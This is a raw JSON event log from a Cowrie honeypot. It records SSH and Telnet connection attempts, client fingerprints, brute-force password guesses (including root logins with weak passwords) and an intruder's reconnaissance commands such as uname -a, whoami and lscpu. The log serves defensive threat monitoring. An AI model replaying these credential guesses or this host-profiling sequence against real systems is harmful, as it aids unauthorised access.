{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:04.044165Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:04.579544Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T10:37:04.580232Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:04.832229Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:05.441865Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T10:37:05.442940Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:05.704769Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:06.227267Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T10:37:06.228268Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:06.489498Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:07.091939Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T10:37:07.092598Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:07.344872Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:37:07.927010Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T10:37:07.927686Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:08.180310Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.closed","duration":"32.6","message":"Connection lost after 32.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:08.181622Z","src_ip":"212.227.235.229","session":"b8911da9ac95"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":42980,"dst_ip":"1.2.3.4","dst_port":22,"session":"d410b1cf9ea6","protocol":"ssh","message":"New connection: 196.251.86.249:42980 (1.2.3.4:22) [session: d410b1cf9ea6]","sensor":"my-vps","timestamp":"2025-08-26T10:37:41.495539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:37:42.007078Z","src_ip":"196.251.86.249","session":"d410b1cf9ea6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:37:42.008469Z","src_ip":"196.251.86.249","session":"d410b1cf9ea6"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:37:44.882917Z","src_ip":"196.251.86.249","session":"d410b1cf9ea6"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:37:46.468247Z","src_ip":"196.251.86.249","session":"d410b1cf9ea6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":43396,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb773e7c4660","protocol":"ssh","message":"New connection: 196.251.86.249:43396 (1.2.3.4:22) [session: cb773e7c4660]","sensor":"my-vps","timestamp":"2025-08-26T10:38:42.939549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:38:43.615569Z","src_ip":"196.251.86.249","session":"cb773e7c4660"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:38:43.616276Z","src_ip":"196.251.86.249","session":"cb773e7c4660"}
{"eventid":"cowrie.login.failed","username":"user","password":"654321","message":"login attempt [user/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:38:45.792379Z","src_ip":"196.251.86.249","session":"cb773e7c4660"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:38:47.393444Z","src_ip":"196.251.86.249","session":"cb773e7c4660"}
{"eventid":"cowrie.session.connect","src_ip":"197.158.4.26","src_port":10793,"dst_ip":"1.2.3.4","dst_port":23,"session":"6382cb63711a","protocol":"telnet","message":"New connection: 197.158.4.26:10793 (1.2.3.4:23) [session: 6382cb63711a]","sensor":"my-vps","timestamp":"2025-08-26T10:39:22.843007Z"}
{"eventid":"cowrie.session.closed","duration":12.772232294082642,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:39:35.615162Z","src_ip":"197.158.4.26","session":"6382cb63711a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60084,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c7e46851cc9","protocol":"ssh","message":"New connection: 212.227.235.229:60084 (1.2.3.4:22) [session: 4c7e46851cc9]","sensor":"my-vps","timestamp":"2025-08-26T10:39:44.750234Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":43988,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b526c78dbb8","protocol":"ssh","message":"New connection: 196.251.86.249:43988 (1.2.3.4:22) [session: 3b526c78dbb8]","sensor":"my-vps","timestamp":"2025-08-26T10:39:45.096011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:39:45.412063Z","src_ip":"212.227.235.229","session":"4c7e46851cc9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:39:45.413500Z","src_ip":"212.227.235.229","session":"4c7e46851cc9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:39:45.778893Z","src_ip":"196.251.86.249","session":"3b526c78dbb8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:39:45.779828Z","src_ip":"196.251.86.249","session":"3b526c78dbb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54568,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6991c14f94","protocol":"ssh","message":"New connection: 212.227.235.229:54568 (1.2.3.4:22) [session: 0f6991c14f94]","sensor":"my-vps","timestamp":"2025-08-26T10:39:46.975962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:39:47.757101Z","src_ip":"212.227.235.229","session":"0f6991c14f94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:39:47.757977Z","src_ip":"212.227.235.229","session":"0f6991c14f94"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:39:47.873178Z","src_ip":"196.251.86.249","session":"3b526c78dbb8"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:39:49.478154Z","src_ip":"196.251.86.249","session":"3b526c78dbb8"}
{"eventid":"cowrie.login.success","username":"root","password":"1975","message":"login attempt [root/1975] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:39:50.185500Z","src_ip":"212.227.235.229","session":"4c7e46851cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"Mandar@123","message":"login attempt [root/Mandar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:39:50.872411Z","src_ip":"212.227.235.229","session":"0f6991c14f94"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:39:51.174129Z","src_ip":"212.227.235.229","session":"4c7e46851cc9"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:39:51.354931Z","src_ip":"212.227.235.229","session":"0f6991c14f94"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:40:00.497082Z","src_ip":"212.227.235.229","session":"8c74f7b97fa3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":44334,"dst_ip":"1.2.3.4","dst_port":22,"session":"382f0c51f7f2","protocol":"ssh","message":"New connection: 196.251.86.249:44334 (1.2.3.4:22) [session: 382f0c51f7f2]","sensor":"my-vps","timestamp":"2025-08-26T10:40:48.838339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:40:48.965597Z","src_ip":"196.251.86.249","session":"382f0c51f7f2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:40:48.966725Z","src_ip":"196.251.86.249","session":"382f0c51f7f2"}
{"eventid":"cowrie.login.failed","username":"user","password":"321","message":"login attempt [user/321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:40:49.875553Z","src_ip":"196.251.86.249","session":"382f0c51f7f2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:40:51.400522Z","src_ip":"196.251.86.249","session":"382f0c51f7f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61706,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd831e933c10","protocol":"ssh","message":"New connection: 212.227.125.160:61706 (1.2.3.4:22) [session: fd831e933c10]","sensor":"my-vps","timestamp":"2025-08-26T10:41:18.944662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T10:41:19.799490Z","src_ip":"212.227.125.160","session":"fd831e933c10"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T10:41:20.818531Z","src_ip":"212.227.125.160","session":"fd831e933c10"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:41:27.559475Z","src_ip":"212.227.125.160","session":"fd831e933c10"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58116,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cc0ed194a30","protocol":"ssh","message":"New connection: 217.72.205.35:58116 (1.2.3.4:22) [session: 7cc0ed194a30]","sensor":"my-vps","timestamp":"2025-08-26T10:41:38.753880Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:41:38.755087Z","src_ip":"217.72.205.35","session":"7cc0ed194a30"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":44726,"dst_ip":"1.2.3.4","dst_port":22,"session":"0908db228810","protocol":"ssh","message":"New connection: 196.251.86.249:44726 (1.2.3.4:22) [session: 0908db228810]","sensor":"my-vps","timestamp":"2025-08-26T10:41:52.004219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:41:52.512978Z","src_ip":"196.251.86.249","session":"0908db228810"}
